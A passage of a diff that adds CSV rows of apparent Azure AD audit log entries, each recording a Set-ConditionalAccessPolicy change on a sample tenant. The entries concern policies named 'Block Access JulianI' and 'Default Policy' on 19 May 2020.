+    ""Name"": ""DisplayName"",
+    ""Value"": ""Block Access JulianI""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-19T13:58:35Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\ba36f0a4-6d73-4ba4-9282-3b3c14575e36""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""ModifiedDateTime\"":\""2020-05-19T13:31:41.7083504Z\"",\""State\"":\""Disabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000002-0000-0ff1-ce00-000000000000\"",\""00000003-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""2935e535-8fdf-4217-865b-e084cb7214f1\""]}]},\""DevicePlatforms\"":{\""Include\"":[{\""DevicePlatforms\"":[\""All\""]}],\""Exclude\"":[{\""DevicePlatforms\"":[\""Android\"",\""iOS\"",\""macOS\""]}]},\""ClientTypes\"":{\""Include\"":[{\""ClientTypes\"":[\""Browser\"",\""Native\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/19/2020 1:58:34 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Block Access JulianI""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-19T13:58:37Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\ba36f0a4-6d73-4ba4-9282-3b3c14575e36""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""ModifiedDateTime\"":\""2020-05-19T13:31:41.7083504Z\"",\""State\"":\""Disabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000002-0000-0ff1-ce00-000000000000\"",\""00000003-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""2935e535-8fdf-4217-865b-e084cb7214f1\""]}]},\""DevicePlatforms\"":{\""Include\"":[{\""DevicePlatforms\"":[\""All\""]}],\""Exclude\"":[{\""DevicePlatforms\"":[\""Android\"",\""iOS\"",\""macOS\""]}]},\""ClientTypes\"":{\""Include\"":[{\""ClientTypes\"":[\""Browser\"",\""Native\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/19/2020 1:58:36 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Block Access JulianI""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-19T13:58:17Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\6490d00c-7ba1-42cf-aa88-99eb71d53bf7""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""LastUpdatedTimestamp\"":\""2020-05-19T13:28:44.6305974Z\"",\""State\"":\""Disabled\"",\""SignInFrequency\"":\""NotSet\"",\""PersistentBrowserSessionMode\"":\""NotSet\""}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/19/2020 1:58:17 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""18""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Default Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": ""2020-05-19T13:39:05.0146113Z""
+  }
+]"
+2020-05-19T13:58:35Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\ba36f0a4-6d73-4ba4-9282-3b3c14575e36""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""ModifiedDateTime\"":\""2020-05-19T13:31:41.7083504Z\"",\""State\"":\""Disabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000002-0000-0ff1-ce00-000000000000\"",\""00000003-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""2935e535-8fdf-4217-865b-e084cb7214f1\""]}]},\""DevicePlatforms\"":{\""Include\"":[{\""DevicePlatforms\"":[\""All\""]}],\""Exclude\"":[{\""DevicePlatforms\"":[\""Android\"",\""iOS\"",\""macOS\""]}]},\""ClientTypes\"":{\""Include\"":[{\""ClientTypes\"":[\""Browser\"",\""Native\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/19/2020 1:58:34 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Block Access JulianI""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-19T13:55:42Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\6490d00c-7ba1-42cf-aa88-99eb71d53bf7""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""LastUpdatedTimestamp\"":\""2020-05-19T13:28:44.6305974Z\"",\""State\"":\""Disabled\"",\""SignInFrequency\"":\""NotSet\"",\""PersistentBrowserSessionMode\"":\""NotSet\""}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/19/2020 1:55:42 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""18""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Default Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": ""2020-05-19T13:39:05.0146113Z""
+  }
+]"
+2020-05-19T13:55:43Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\6490d00c-7ba1-42cf-aa88-99eb71d53bf7""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""LastUpdatedTimestamp\"":\""2020-05-19T13:28:44.6305974Z\"",\""State\"":\""Disabled\"",\""SignInFrequency\"":\""NotSet\"",\""PersistentBrowserSessionMode\"":\""NotSet\""}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/19/2020 1:55:42 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""18""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Default Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": ""2020-05-19T13:39:05.0146113Z""
+  }
+]"
+2020-05-19T13:55:46Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\ba36f0a4-6d73-4ba4-9282-3b3c14575e36""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""ModifiedDateTime\"":\""2020-05-19T13:31:41.7083504Z\"",\""State\"":\""Disabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000002-0000-0ff1-ce00-000000000000\"",\""00000003-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""2935e535-8fdf-4217-865b-e084cb7214f1\""]}]},\""DevicePlatforms\"":{\""Include\"":[{\""DevicePlatforms\"":[\""All\""]}],\""Exclude\"":[{\""DevicePlatforms\"":[\""Android\"",\""iOS\"",\""macOS\""]}]},\""ClientTypes\"":{\""Include\"":[{\""ClientTypes\"":[\""Browser\"",\""Native\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/19/2020 1:55:46 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Block Access JulianI""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-19T13:33:15Z,NT AUTHORITY\SYSTEM (w3wp),52.229.51.154:64325,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\ba36f0a4-6d73-4ba4-9282-3b3c14575e36""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""ModifiedDateTime\"":\""2020-05-19T13:31:41.7083504Z\"",\""State\"":\""Disabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000002-0000-0ff1-ce00-000000000000\"",\""00000003-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""2935e535-8fdf-4217-865b-e084cb7214f1\""]}]},\""DevicePlatforms\"":{\""Include\"":[{\""DevicePlatforms\"":[\""All\""]}],\""Exclude\"":[{\""DevicePlatforms\"":[\""Android\"",\""iOS\"",\""macOS\""]}]},\""ClientTypes\"":{\""Include\"":[{\""ClientTypes\"":[\""Browser\"",\""Native\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/19/2020 1:33:14 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Block Access JulianI""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-19T13:34:12Z,NT AUTHORITY\SYSTEM (w3wp),40.114.117.193:42782,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\ba36f0a4-6d73-4ba4-9282-3b3c14575e36""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""ModifiedDateTime\"":\""2020-05-19T13:31:41.7083504Z\"",\""State\"":\""Disabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000002-0000-0ff1-ce00-000000000000\"",\""00000003-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""2935e535-8fdf-4217-865b-e084cb7214f1\""]}]},\""DevicePlatforms\"":{\""Include\"":[{\""DevicePlatforms\"":[\""All\""]}],\""Exclude\"":[{\""DevicePlatforms\"":[\""Android\"",\""iOS\"",\""macOS\""]}]},\""ClientTypes\"":{\""Include\"":[{\""ClientTypes\"":[\""Browser\"",\""Native\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/19/2020 1:34:12 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Block Access JulianI""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-19T13:33:47Z,NT AUTHORITY\SYSTEM (w3wp),40.114.117.193:54314,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\6490d00c-7ba1-42cf-aa88-99eb71d53bf7""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""LastUpdatedTimestamp\"":\""2020-05-19T13:28:44.6305974Z\"",\""State\"":\""Disabled\"",\""SignInFrequency\"":\""NotSet\"",\""PersistentBrowserSessionMode\"":\""NotSet\""}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/19/2020 1:33:47 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""18""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Default Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": ""2020-05-19T13:31:42.3802191Z""
+  }
+]"
+2020-05-19T13:32:07Z,NT AUTHORITY\SYSTEM (w3wp),40.114.117.193:13648,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\ba36f0a4-6d73-4ba4-9282-3b3c14575e36""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""ModifiedDateTime\"":\""2020-05-19T13:31:41.7083504Z\"",\""State\"":\""Disabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000002-0000-0ff1-ce00-000000000000\"",\""00000003-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""2935e535-8fdf-4217-865b-e084cb7214f1\""]}]},\""DevicePlatforms\"":{\""Include\"":[{\""DevicePlatforms\"":[\""All\""]}],\""Exclude\"":[{\""DevicePlatforms\"":[\""Android\"",\""iOS\"",\""macOS\""]}]},\""ClientTypes\"":{\""Include\"":[{\""ClientTypes\"":[\""Browser\"",\""Native\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/19/2020 1:32:06 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Block Access JulianI""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-19T13:32:11Z,NT AUTHORITY\SYSTEM (w3wp),52.229.51.154:14764,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\ba36f0a4-6d73-4ba4-9282-3b3c14575e36""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""ModifiedDateTime\"":\""2020-05-19T13:31:41.7083504Z\"",\""State\"":\""Disabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000002-0000-0ff1-ce00-000000000000\"",\""00000003-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""2935e535-8fdf-4217-865b-e084cb7214f1\""]}]},\""DevicePlatforms\"":{\""Include\"":[{\""DevicePlatforms\"":[\""All\""]}],\""Exclude\"":[{\""DevicePlatforms\"":[\""Android\"",\""iOS\"",\""macOS\""]}]},\""ClientTypes\"":{\""Include\"":[{\""ClientTypes\"":[\""Browser\"",\""Native\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/19/2020 1:32:11 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Block Access JulianI""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-19T13:32:33Z,NT AUTHORITY\SYSTEM (w3wp),40.114.117.193:43605,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\6490d00c-7ba1-42cf-aa88-99eb71d53bf7""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""LastUpdatedTimestamp\"":\""2020-05-19T13:28:44.6305974Z\"",\""State\"":\""Disabled\"",\""SignInFrequency\"":\""NotSet\"",\""PersistentBrowserSessionMode\"":\""NotSet\""}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/19/2020 1:32:33 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""18""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Default Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": ""2020-05-19T13:31:42.3802191Z""
+  }
+]"
+2020-05-19T13:32:28Z,NT AUTHORITY\SYSTEM (w3wp),40.114.117.193:32052,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\ba36f0a4-6d73-4ba4-9282-3b3c14575e36""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""ModifiedDateTime\"":\""2020-05-19T13:31:41.7083504Z\"",\""State\"":\""Disabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000002-0000-0ff1-ce00-000000000000\"",\""00000003-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""2935e535-8fdf-4217-865b-e084cb7214f1\""]}]},\""DevicePlatforms\"":{\""Include\"":[{\""DevicePlatforms\"":[\""All\""]}],\""Exclude\"":[{\""DevicePlatforms\"":[\""Android\"",\""iOS\"",\""macOS\""]}]},\""ClientTypes\"":{\""Include\"":[{\""ClientTypes\"":[\""Browser\"",\""Native\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/19/2020 1:32:27 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Block Access JulianI""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-19T13:31:16Z,NT AUTHORITY\SYSTEM (w3wp),40.114.117.193:2740,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\6490d00c-7ba1-42cf-aa88-99eb71d53bf7""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""LastUpdatedTimestamp\"":\""2020-05-19T13:28:44.6305974Z\"",\""State\"":\""Disabled\"",\""SignInFrequency\"":\""NotSet\"",\""PersistentBrowserSessionMode\"":\""NotSet\""}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/19/2020 1:31:15 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""18""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Default Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-19T13:32:27Z,NT AUTHORITY\SYSTEM (w3wp),40.114.117.193:5290,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\6490d00c-7ba1-42cf-aa88-99eb71d53bf7""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""LastUpdatedTimestamp\"":\""2020-05-19T13:28:44.6305974Z\"",\""State\"":\""Disabled\"",\""SignInFrequency\"":\""NotSet\"",\""PersistentBrowserSessionMode\"":\""NotSet\""}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/19/2020 1:32:27 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""18""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Default Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": ""2020-05-19T13:31:42.3802191Z""
+  }
+]"
+2020-05-19T13:30:12Z,NT AUTHORITY\SYSTEM (w3wp),52.229.51.154:60177,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\ba36f0a4-6d73-4ba4-9282-3b3c14575e36""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""ModifiedDateTime\"":\""2020-05-19T13:28:43.7456101Z\"",\""State\"":\""Reporting\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000002-0000-0ff1-ce00-000000000000\"",\""00000003-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""2935e535-8fdf-4217-865b-e084cb7214f1\""]}]},\""DevicePlatforms\"":{\""Include\"":[{\""DevicePlatforms\"":[\""All\""]}],\""Exclude\"":[{\""DevicePlatforms\"":[\""Android\"",\""iOS\"",\""macOS\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/19/2020 1:30:12 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Block Access JulianI""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-19T13:58:13Z,NT AUTHORITY\SYSTEM (w3wp),40.114.117.193:36177,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\6490d00c-7ba1-42cf-aa88-99eb71d53bf7""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""LastUpdatedTimestamp\"":\""2020-05-19T13:28:44.6305974Z\"",\""State\"":\""Disabled\"",\""SignInFrequency\"":\""NotSet\"",\""PersistentBrowserSessionMode\"":\""NotSet\""}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/19/2020 1:58:12 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""18""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Default Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": ""2020-05-19T13:39:05.0146113Z""
+  }
+]"
+2020-05-19T13:58:37Z,NT AUTHORITY\SYSTEM (w3wp),52.229.51.154:25129,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\ba36f0a4-6d73-4ba4-9282-3b3c14575e36""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""ModifiedDateTime\"":\""2020-05-19T13:31:41.7083504Z\"",\""State\"":\""Disabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000002-0000-0ff1-ce00-000000000000\"",\""00000003-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""2935e535-8fdf-4217-865b-e084cb7214f1\""]}]},\""DevicePlatforms\"":{\""Include\"":[{\""DevicePlatforms\"":[\""All\""]}],\""Exclude\"":[{\""DevicePlatforms\"":[\""Android\"",\""iOS\"",\""macOS\""]}]},\""ClientTypes\"":{\""Include\"":[{\""ClientTypes\"":[\""Browser\"",\""Native\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/19/2020 1:58:36 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Block Access JulianI""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-19T13:58:35Z,NT AUTHORITY\SYSTEM (w3wp),40.114.117.193:31327,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\ba36f0a4-6d73-4ba4-9282-3b3c14575e36""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""ModifiedDateTime\"":\""2020-05-19T13:31:41.7083504Z\"",\""State\"":\""Disabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000002-0000-0ff1-ce00-000000000000\"",\""00000003-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""2935e535-8fdf-4217-865b-e084cb7214f1\""]}]},\""DevicePlatforms\"":{\""Include\"":[{\""DevicePlatforms\"":[\""All\""]}],\""Exclude\"":[{\""DevicePlatforms\"":[\""Android\"",\""iOS\"",\""macOS\""]}]},\""ClientTypes\"":{\""Include\"":[{\""ClientTypes\"":[\""Browser\"",\""Native\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/19/2020 1:58:34 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Block Access JulianI""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-19T13:58:37Z,NT AUTHORITY\SYSTEM (w3wp),52.229.51.154:30905,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\ba36f0a4-6d73-4ba4-9282-3b3c14575e36""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""ModifiedDateTime\"":\""2020-05-19T13:31:41.7083504Z\"",\""State\"":\""Disabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000002-0000-0ff1-ce00-000000000000\"",\""00000003-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""2935e535-8fdf-4217-865b-e084cb7214f1\""]}]},\""DevicePlatforms\"":{\""Include\"":[{\""DevicePlatforms\"":[\""All\""]}],\""Exclude\"":[{\""DevicePlatforms\"":[\""Android\"",\""iOS\"",\""macOS\""]}]},\""ClientTypes\"":{\""Include\"":[{\""ClientTypes\"":[\""Browser\"",\""Native\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/19/2020 1:58:36 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Block Access JulianI""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-19T13:58:17Z,NT AUTHORITY\SYSTEM (w3wp),52.229.51.154:52552,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\6490d00c-7ba1-42cf-aa88-99eb71d53bf7""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""LastUpdatedTimestamp\"":\""2020-05-19T13:28:44.6305974Z\"",\""State\"":\""Disabled\"",\""SignInFrequency\"":\""NotSet\"",\""PersistentBrowserSessionMode\"":\""NotSet\""}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/19/2020 1:58:17 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""18""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Default Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": ""2020-05-19T13:39:05.0146113Z""
+  }
+]"
+2020-05-19T13:58:35Z,NT AUTHORITY\SYSTEM (w3wp),40.114.117.193:40980,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\ba36f0a4-6d73-4ba4-9282-3b3c14575e36""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
